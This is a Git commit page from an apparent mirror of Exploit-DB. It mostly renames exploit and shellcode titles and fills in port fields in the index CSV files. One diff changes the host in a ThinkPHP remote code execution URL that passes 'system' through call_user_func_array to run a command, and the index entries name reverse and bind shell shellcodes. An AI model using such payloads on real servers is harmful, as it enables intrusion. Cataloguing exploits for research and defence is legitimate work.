bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-12-13

Browse source 
2 changes to exploits/shellcodes

Xlight FTP Server 1.25/1.41 - 'PASS'  Remote Buffer Overflow
Xlight FTP Server 1.25/1.41 - 'PASS' Remote Buffer Overflow

HP Printer FTP Print Server 2.4.5 - 'LIST'  Buffer Overflow
HP Printer FTP Print Server 2.4.5 - 'LIST' Buffer Overflow

Qbik WinGate 6.2.2 - 'LIST'  Remote Denial of Service
Qbik WinGate 6.2.2 - 'LIST' Remote Denial of Service

Quick 'n Easy FTP Server 3.9.1 - 'USER'  Remote Buffer Overflow
Quick 'n Easy FTP Server 3.9.1 - 'USER' Remote Buffer Overflow

Linux Kernel - 'AF_PACKET' Use-After-Free
Linux Kernel - 'AF_PACKET' Use-After-Free (2)

Linux Kernel - 'AF_PACKET' Use-After-Free
Linux Kernel - 'AF_PACKET' Use-After-Free (1)

WebRTC - VP9 Frame Processing  Out-of-Bounds Memory Access
WebRTC - VP9 Frame Processing Out-of-Bounds Memory Access

Oracle VirtualBox Manager 5.2.18 r124319  - 'Name Attribute' Denial of Service (PoC)
Oracle VirtualBox Manager 5.2.18 r124319 - 'Name Attribute' Denial of Service (PoC)

Systrace 1.x (x64) - Aware Linux Kernel Privilege Escalation
Systrace 1.x (Linux Kernel  x64) - Aware Local Privilege Escalation

PonyOS 3.0 - TTY 'ioctl()' Local Kernel
PonyOS 3.0 - TTY 'ioctl()' Kernel Local Privilege Escalation

Microsoft Windows 10  (Build 1703  Creators Update) (x86) - 'WARBIRD' 'NtQuerySystemInformation ' Kernel Local Privilege Escalation
Microsoft Windows 10 (Build 1703 Creators Update) (x86) - 'WARBIRD' 'NtQuerySystemInformation ' Kernel Local Privilege Escalation

Linux Kernel <  4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation

Linux Kernel  4.14.7 (Ubuntu 16.04 / CentOS 7) - (KASLR & SMEP Bypass) Arbitrary File Read
Linux Kernel 4.14.7 (Ubuntu 16.04 / CentOS 7) - (KASLR & SMEP Bypass) Arbitrary File Read

Microsoft Windows - JPEG GDI+ All-in-One Bind/Reverse/Admin/FileDownload
Microsoft Windows - JPEG GDI+ Bind/Reverse/Admin/File Download

Golden FTP Server 4.70 - 'PASS'  Buffer Overflow
Golden FTP Server 4.70 - 'PASS' Buffer Overflow

EasyFTP Server 1.7.0.11 - 'LIST'  Stack Buffer Overflow (Metasploit)
EasyFTP Server 1.7.0.11 - 'LIST' Stack Buffer Overflow (Metasploit)

Actfax FTP Server 4.27 - 'USER'  Stack Buffer Overflow (Metasploit)
Actfax FTP Server 4.27 - 'USER' Stack Buffer Overflow (Metasploit)

Sami FTP Server 2.0.1 - 'LIST'  Buffer Overflow
Sami FTP Server 2.0.1 - 'LIST' Buffer Overflow

Sami FTP Server - 'LIST'  Buffer Overflow (Metasploit)
Sami FTP Server - 'LIST' Buffer Overflow (Metasploit)
Apache Struts 2.3 < 2.3.34 /  2.5 < 2.5.16 - Remote Code Execution (1)
Apache Struts 2.3 < 2.3.34 /  2.5 < 2.5.16 - Remote Code Execution (2)
Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (1)
Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (2)

IGSuite 3.2.4 - Reverse Shell Blind SQL Injection
IGSuite 3.2.4 - Reverse Shell / Blind SQL Injection

Sitemakin SLAC 1.0 -  'my_item_search' SQL Injection
Sitemakin SLAC 1.0 - 'my_item_search' SQL Injection

Dolibarr ERP/CRM  < 7.0.3 - PHP Code Injection
Dolibarr ERP/CRM < 7.0.3 - PHP Code Injection

MTGAS  MOGG Web Simulator Script - SQL Injection
MTGAS MOGG Web Simulator Script - SQL Injection

Tourism Website Blog - Remote Code Execution / SQL Injection
Alumni Tracer SMS Notification - SQL Injection / Cross-Site Request Forgery
PrestaShop 1.6.x/1.7.x - Remote Code Execution
DomainMOD 4.11.01 - Cross-Site Scripting
Alumni Tracer SMS Notification - SQL Injection / Cross-Site Request Forgery
PrestaShop 1.6.x/1.7.x - Remote Code Execution
DomainMOD 4.11.01 - Cross-Site Scripting
TP-Link wireless router Archer C1200 - Cross-Site Scripting
Huawei B315s-22 - Information Leak
TP-Link wireless router Archer C1200 - Cross-Site Scripting
Huawei B315s-22 - Information Leak
HotelDruid 2.3.0 - 'id_utente_mod' SQL Injection
WordPress Plugin AutoSuggest 0.24 - 'wpas_keys' SQL Injection
ThinkPHP 5.0.23/5.1.31 - Remote Code Execution
HotelDruid 2.3.0 - 'id_utente_mod' SQL Injection
WordPress Plugin AutoSuggest 0.24 - 'wpas_keys' SQL Injection
ThinkPHP 5.0.23/5.1.31 - Remote Code Execution

Linux/x86 - execve(/usr/bin/ncat -lvp 1337 -e /bin/bash)+Null-Free Shellcode (95 bytes)
Linux/x86 - Bind (1337/TCP) Ncat (/usr/bin/ncat) Shell (/bin/bash) + Null-Free Shellcode (95 bytes)
This commit is contained in:
Offensive Security 2018-12-13 05:01:45 +00:00
parent a07949d1c7
commit 25e5c32779
4 changed files with 38 additions and 38 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

2
exploits/php/webapps/45978.txt
View file

@ -8,4 +8,4 @@
# Exploit
http://tp.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();'
http://server/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();'

30
files_exploits.csv
View file

@ -5496,7 +5496,7 @@ id,file,description,date,author,type,platform,port
44007,exploits/macos/dos/44007.c,"macOS Kernel - Use-After-Free Due to Lack of Locking in 'AppleEmbeddedOSSupportHostClient::registerNotificationPort'",2018-02-09,"Google Security Research",dos,macos,
44035,exploits/windows/dos/44035.py,"GNU binutils 2.26.1 - Integer Overflow (PoC)",2018-02-14,r4xis,dos,windows,
44046,exploits/windows/dos/44046.md,"K7 Total Security 15.1.0.305 - Device Driver Arbitrary Memory Read",2017-10-23,SecuriTeam,dos,windows,
44053,exploits/linux/dos/44053.md,"Linux Kernel - 'AF_PACKET' Use-After-Free",2017-10-17,SecuriTeam,dos,linux,
44053,exploits/linux/dos/44053.md,"Linux Kernel - 'AF_PACKET' Use-After-Free (2)",2017-10-17,SecuriTeam,dos,linux,
44057,exploits/php/dos/44057.md,"Oracle Java JDK/JRE < 1.8.0.131 / Apache Xerces 2.11.0 - 'PDF/Docx' Server Side Denial of Service",2017-08-30,SecuriTeam,dos,php,
44075,exploits/windows/dos/44075.txt,"Microsoft Edge Chakra JIT - 'GlobOpt::OptTagChecks' Must Consider IsLoopPrePass Properly (2)",2018-02-15,"Google Security Research",dos,windows,
44076,exploits/windows/dos/44076.js,"Microsoft Edge Chakra JIT - Memory Corruption",2018-02-15,"Google Security Research",dos,windows,
@ -5808,7 +5808,7 @@ id,file,description,date,author,type,platform,port
42999,exploits/windows/dos/42999.js,"Microsoft Edge Chakra - 'StackScriptFunction::BoxState::Box' Accesses to Uninitialized Pointers (Denial of Service)",2017-10-17,"Google Security Research",dos,windows,
43000,exploits/windows/dos/43000.js,"Microsoft Edge Chakra JIT - 'RegexHelper::StringReplace' Must Call the Callback Function with Updating ImplicitCallFlags",2017-10-17,"Google Security Research",dos,windows,
43001,exploits/windows/dos/43001.cpp,"Microsoft Windows - 'nt!NtQueryObject (ObjectNameInformation)' Kernel Pool Memory Disclosure",2017-10-17,"Google Security Research",dos,windows,
43010,exploits/linux/dos/43010.c,"Linux Kernel - 'AF_PACKET' Use-After-Free",2017-10-17,SecuriTeam,dos,linux,
43010,exploits/linux/dos/43010.c,"Linux Kernel - 'AF_PACKET' Use-After-Free (1)",2017-10-17,SecuriTeam,dos,linux,
43107,exploits/ios/dos/43107.py,"WhatsApp 2.17.52 - Memory Corruption",2017-11-01,"Juan Sacco",dos,ios,
43014,exploits/linux/dos/43014.txt,"Xen - Pagetable De-typing Unbounded Recursion",2017-10-18,"Google Security Research",dos,linux,
43020,exploits/multiple/dos/43020.txt,"Mozilla Firefox < 55 - Denial of Service",2017-10-20,"Amit Sangra",dos,multiple,
@ -9062,7 +9062,7 @@ id,file,description,date,author,type,platform,port
32693,exploits/php/local/32693.php,"suPHP 0.7 - 'suPHP_ConfigPath' / 'Safe_Mode()' Restriction Bypass",2008-12-31,Mr.SaFa7,local,php,
32700,exploits/linux/local/32700.rb,"ibstat $PATH - Local Privilege Escalation (Metasploit)",2014-04-04,Metasploit,local,linux,
32737,exploits/windows/local/32737.pl,"BlazeDVD Pro Player 6.1 - Stack Buffer Overflow Jump ESP",2014-04-08,"Deepak Rathore",local,windows,
32751,exploits/linux_x86-64/local/32751.c,"Systrace 1.x (x64) - Aware Linux Kernel Privilege Escalation",2009-01-23,"Chris Evans",local,linux_x86-64,
32751,exploits/linux_x86-64/local/32751.c,"Systrace 1.x (Linux Kernel x64) - Aware Local Privilege Escalation",2009-01-23,"Chris Evans",local,linux_x86-64,
32752,exploits/windows/local/32752.rb,"WinRAR - Filename Spoofing (Metasploit)",2014-04-08,Metasploit,local,windows,
32771,exploits/windows/local/32771.txt,"Kaspersky (Multiple Products) - 'klim5.sys' Local Privilege Escalation",2009-02-02,"Ruben Santamarta",local,windows,
32778,exploits/windows/local/32778.pl,"Password Door 8.4 - Local Buffer Overflow",2009-02-05,b3hz4d,local,windows,
@ -9268,7 +9268,7 @@ id,file,description,date,author,type,platform,port
37197,exploits/windows/local/37197.py,"Jildi FTP Client 1.5.6 - Local Buffer Overflow (SEH)",2015-06-04,"Zahid Adeel",local,windows,
37167,exploits/linux/local/37167.c,"PonyOS 3.0 - VFS Permissions",2015-06-01,"Hacker Fantastic",local,linux,
37168,exploits/linux/local/37168.txt,"PonyOS 3.0 - ELF Loader Privilege Escalation",2015-06-01,"Hacker Fantastic",local,linux,
37183,exploits/linux/local/37183.c,"PonyOS 3.0 - TTY 'ioctl()' Local Kernel",2015-06-02,"Hacker Fantastic",local,linux,
37183,exploits/linux/local/37183.c,"PonyOS 3.0 - TTY 'ioctl()' Kernel Local Privilege Escalation",2015-06-02,"Hacker Fantastic",local,linux,
37211,exploits/windows/local/37211.html,"1 Click Audio Converter 2.3.6 - Activex Local Buffer Overflow",2015-06-05,metacom,local,windows,
37212,exploits/windows/local/37212.html,"1 Click Extract Audio 2.3.6 - Activex Buffer Overflow",2015-06-05,metacom,local,windows,
37265,exploits/linux/local/37265.txt,"OSSEC 2.7 < 2.8.1 - 'diff' Local Privilege Escalation",2015-06-11,"Andrew Widdersheim",local,linux,
@ -10336,7 +10336,7 @@ id,file,description,date,author,type,platform,port
475,exploits/windows/remote/475.sh,"Microsoft Windows - JPEG GDI+ Overflow Administrator (MS04-028)",2004-09-23,"Elia Florio",remote,windows,
478,exploits/windows/remote/478.c,"Microsoft Windows - JPEG GDI+ Overflow Download Shellcode (MS04-028)",2004-09-25,ATmaCA,remote,windows,
480,exploits/windows/remote/480.c,"Microsoft Windows - JPEG GDI+ Remote Heap Overflow (MS04-028)",2004-09-25,"John Bissell",remote,windows,
556,exploits/windows/remote/556.c,"Microsoft Windows - JPEG GDI+ All-in-One Bind/Reverse/Admin/FileDownload",2004-09-27,M4Z3R,remote,windows,
556,exploits/windows/remote/556.c,"Microsoft Windows - JPEG GDI+ Bind/Reverse/Admin/File Download",2004-09-27,M4Z3R,remote,windows,
566,exploits/windows/remote/566.pl,"IPSwitch WhatsUp Gold 8.03 - Remote Buffer Overflow",2004-10-04,LoWNOISE,remote,windows,80
568,exploits/windows/remote/568.c,"Icecast 2.0.1 (Win32) - Remote Code Execution (1)",2004-10-06,Delikon,remote,windows,8000
572,exploits/windows/remote/572.pl,"Eudora 6.2.0.7 - Attachment Spoofer",2004-10-11,"Paul Szabo",remote,windows,
@ -20242,7 +20242,7 @@ id,file,description,date,author,type,platform,port
5895,exploits/php/webapps/5895.txt,"shibby shop 2.2 - Multiple Vulnerabilities",2008-06-22,KnocKout,webapps,php,
5896,exploits/php/webapps/5896.txt,"CMS Mini 0.2.2 - Multiple Local File Inclusions",2008-06-22,"CWH Underground",webapps,php,
5897,exploits/php/webapps/5897.txt,"phpDMCA 1.0.0 - Multiple Remote File Inclusions",2008-06-22,CraCkEr,webapps,php,
5898,exploits/php/webapps/5898.pl,"IGSuite 3.2.4 - Reverse Shell Blind SQL Injection",2008-06-22,"Guido Landi",webapps,php,
5898,exploits/php/webapps/5898.pl,"IGSuite 3.2.4 - Reverse Shell / Blind SQL Injection",2008-06-22,"Guido Landi",webapps,php,
5899,exploits/php/webapps/5899.txt,"PageSquid CMS 0.3 Beta - 'index.php' SQL Injection",2008-06-22,"CWH Underground",webapps,php,
5900,exploits/php/webapps/5900.txt,"RSS-aggregator - 'path' Remote File Inclusion",2008-06-22,"Ghost Hacker",webapps,php,
5901,exploits/php/webapps/5901.txt,"MiGCMS 2.0.5 - Multiple Remote File Inclusions",2008-06-22,CraCkEr,webapps,php,
@ -40449,7 +40449,7 @@ id,file,description,date,author,type,platform,port
45933,exploits/linux/webapps/45933.py,"Apache Superset < 0.23 - Remote Code Execution",2018-12-03,"David May",webapps,linux,
45935,exploits/php/webapps/45935.txt,"WordPress Plugin Advanced-Custom-Fields 5.7.7 - Cross-Site Scripting",2018-12-03,"Loading Kura Kura",webapps,php,80
45937,exploits/hardware/webapps/45937.txt,"Rockwell Automation Allen-Bradley PowerMonitor 1000 - Incorrect Access Control Authentication Bypass",2018-12-04,Luca.Chiou,webapps,hardware,80
45962,exploits/php/webapps/45962.txt,"Tourism Website Blog - Remote Code Execution / SQL Injection",2018-12-11,"Ihsan Sencan",webapps,php,
45962,exploits/php/webapps/45962.txt,"Tourism Website Blog - Remote Code Execution / SQL Injection",2018-12-11,"Ihsan Sencan",webapps,php,80
45941,exploits/php/webapps/45941.txt,"DomainMOD 4.11.01 - Owner name Field Cross-Site Scripting",2018-12-04,"Mohammed Abdul Raheem",webapps,php,80
45942,exploits/hardware/webapps/45942.py,"NEC Univerge Sv9100 WebPro - 6.00 - Predictable Session ID / Clear Text Password Storage",2018-12-04,hyp3rlinx,webapps,hardware,
45944,exploits/php/webapps/45944.txt,"KeyBase Botnet 1.5 - SQL Injection",2018-12-04,n4pst3r,webapps,php,
@ -40463,17 +40463,17 @@ id,file,description,date,author,type,platform,port
45957,exploits/php/webapps/45957.py,"i-doit CMDB 1.11.2 - Remote Code Execution",2018-12-09,AkkuS,webapps,php,
45958,exploits/php/webapps/45958.txt,"Adiscon LogAnalyzer < 4.1.7 - Cross-Site Scripting",2018-12-09,"Gustavo Sorondo",webapps,php,80
45959,exploits/php/webapps/45959.txt,"DomainMOD 4.11.01 - 'DisplayName' Cross-Site Scripting",2018-12-09,"Mohammed Abdul Raheem",webapps,php,80
45963,exploits/php/webapps/45963.txt,"Alumni Tracer SMS Notification - SQL Injection / Cross-Site Request Forgery",2018-12-11,"Ihsan Sencan",webapps,php,
45964,exploits/php/webapps/45964.php,"PrestaShop 1.6.x/1.7.x - Remote Code Execution",2018-12-11,"Fariskhi Vidyan",webapps,php,
45967,exploits/php/webapps/45967.txt,"DomainMOD 4.11.01 - Cross-Site Scripting",2018-12-11,"Mohammed Abdul Raheem",webapps,php,
45963,exploits/php/webapps/45963.txt,"Alumni Tracer SMS Notification - SQL Injection / Cross-Site Request Forgery",2018-12-11,"Ihsan Sencan",webapps,php,80
45964,exploits/php/webapps/45964.php,"PrestaShop 1.6.x/1.7.x - Remote Code Execution",2018-12-11,"Fariskhi Vidyan",webapps,php,80
45967,exploits/php/webapps/45967.txt,"DomainMOD 4.11.01 - Cross-Site Scripting",2018-12-11,"Mohammed Abdul Raheem",webapps,php,80
45969,exploits/multiple/webapps/45969.txt,"PrinterOn Enterprise 4.1.4 - Arbitrary File Deletion",2018-12-11,bzyo,webapps,multiple,
45970,exploits/hardware/webapps/45970.txt,"TP-Link wireless router Archer C1200 - Cross-Site Scripting",2018-12-11,"Usman Saeed",webapps,hardware,
45971,exploits/hardware/webapps/45971.txt,"Huawei B315s-22 - Information Leak",2018-12-11,"Usman Saeed",webapps,hardware,
45970,exploits/hardware/webapps/45970.txt,"TP-Link wireless router Archer C1200 - Cross-Site Scripting",2018-12-11,"Usman Saeed",webapps,hardware,80
45971,exploits/hardware/webapps/45971.txt,"Huawei B315s-22 - Information Leak",2018-12-11,"Usman Saeed",webapps,hardware,80
45972,exploits/hardware/webapps/45972.txt,"ZTE ZXHN H168N - Improper Access Restrictions",2018-12-11,"Usman Saeed",webapps,hardware,
45973,exploits/aspx/webapps/45973.txt,"Sitecore CMS 8.2 - Cross-Site Scripting / Arbitrary File Disclosure",2017-05-05,"Usman Saeed",webapps,aspx,
45974,exploits/php/webapps/45974.txt,"IceWarp Mail Server 11.0.0.0 - Cross-Site Scripting",2014-02-17,"Usman Saeed",webapps,php,
45975,exploits/multiple/webapps/45975.txt,"Apache OFBiz 16.11.05 - Cross-Site Scripting",2018-12-11,DKM,webapps,multiple,
45976,exploits/php/webapps/45976.txt,"HotelDruid 2.3.0 - 'id_utente_mod' SQL Injection",2018-12-11,"Sainadh Jamalpur",webapps,php,
45977,exploits/php/webapps/45977.txt,"WordPress Plugin AutoSuggest 0.24 - 'wpas_keys' SQL Injection",2018-12-11,Kaimi,webapps,php,
45978,exploits/php/webapps/45978.txt,"ThinkPHP 5.0.23/5.1.31 - Remote Code Execution",2018-12-11,VulnSpy,webapps,php,
45976,exploits/php/webapps/45976.txt,"HotelDruid 2.3.0 - 'id_utente_mod' SQL Injection",2018-12-11,"Sainadh Jamalpur",webapps,php,80
45977,exploits/php/webapps/45977.txt,"WordPress Plugin AutoSuggest 0.24 - 'wpas_keys' SQL Injection",2018-12-11,Kaimi,webapps,php,80
45978,exploits/php/webapps/45978.txt,"ThinkPHP 5.0.23/5.1.31 - Remote Code Execution",2018-12-11,VulnSpy,webapps,php,80
45979,exploits/multiple/webapps/45979.txt,"Adobe ColdFusion 2018 - Arbitrary File Upload",2018-12-11,"Vahagn Vardanyan",webapps,multiple,

Can't render this file because it is too large.

2
files_shellcodes.csv
View file

@ -925,4 +925,4 @@ id,file,description,date,author,type,platform
45821,shellcodes/linux_x86/45821.c,"Linux/x86 - Bind (99999/TCP) NetCat Traditional (/bin/nc) Shell (/bin/bash) Shellcode (58 bytes)",2018-11-13,"Javier Tello",shellcode,linux_x86
45940,shellcodes/linux/45940.nasm,"Linux/x86 - /usr/bin/head -n99 cat etc/passwd Shellcode (61 Bytes)",2018-12-04,Nelis,shellcode,linux
45943,shellcodes/linux_x86-64/45943.c,"Linux/x64 - Reverse (0.0.0.0:1907/TCP) Shell Shellcode (119 Bytes)",2018-12-04,"Kağan Çapar",shellcode,linux_x86-64
45980,shellcodes/linux_x86/45980.c,"Linux/x86 - execve(/usr/bin/ncat -lvp 1337 -e /bin/bash)+Null-Free Shellcode (95 bytes)",2018-12-11,T3jv1l,shellcode,linux_x86
45980,shellcodes/linux_x86/45980.c,"Linux/x86 - Bind (1337/TCP) Ncat (/usr/bin/ncat) Shell (/bin/bash) + Null-Free Shellcode (95 bytes)",2018-12-11,T3jv1l,shellcode,linux_x86

1 id file description date author type platform
925 45821 shellcodes/linux_x86/45821.c Linux/x86 - Bind (99999/TCP) NetCat Traditional (/bin/nc) Shell (/bin/bash) Shellcode (58 bytes) 2018-11-13 Javier Tello shellcode linux_x86
926 45940 shellcodes/linux/45940.nasm Linux/x86 - /usr/bin/head -n99 cat etc/passwd Shellcode (61 Bytes) 2018-12-04 Nelis shellcode linux
927 45943 shellcodes/linux_x86-64/45943.c Linux/x64 - Reverse (0.0.0.0:1907/TCP) Shell Shellcode (119 Bytes) 2018-12-04 Kağan Çapar shellcode linux_x86-64
928 45980 shellcodes/linux_x86/45980.c Linux/x86 - execve(/usr/bin/ncat -lvp 1337 -e /bin/bash)+Null-Free Shellcode (95 bytes) Linux/x86 - Bind (1337/TCP) Ncat (/usr/bin/ncat) Shell (/bin/bash) + Null-Free Shellcode (95 bytes) 2018-12-11 T3jv1l shellcode linux_x86